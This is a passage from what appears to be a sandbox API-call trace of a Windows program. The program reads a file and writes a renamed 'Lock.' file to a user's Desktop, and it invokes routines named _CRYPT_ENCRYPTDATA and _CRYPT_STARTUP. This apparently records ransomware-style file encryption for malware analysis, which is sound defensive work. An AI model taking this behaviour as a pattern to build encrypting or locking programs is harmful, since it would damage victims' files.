dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0210.755] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.755] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0210.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0210.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0210.756] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0210.756] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.wg77xQT1-Aj18nXa8K.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.wg77xqt1-aj18nxa8k.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0210.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0210.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.806] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0210.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0210.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0210.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0210.810] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0210.810] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x96cc, lpOverlapped=0x0) returned 1 [0210.814] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0210.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0210.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0210.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2f24018 [0210.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0210.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0210.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2f2d6f0 [0210.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0210.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0210.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0210.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0210.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2f24018 [0210.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0210.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0210.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0210.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0210.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0210.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0210.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0210.823] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0210.823] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0210.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0210.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0210.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2f24018 [0210.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0210.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0210.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0210.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0210.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0210.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x96cc) returned 0x2f36dc8 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0210.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0210.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0210.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0210.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0210.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0210.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0210.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0210.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.831] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0210.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0210.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0210.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0210.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0210.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.928] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0210.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0210.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0210.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0210.929] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0210.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.929] 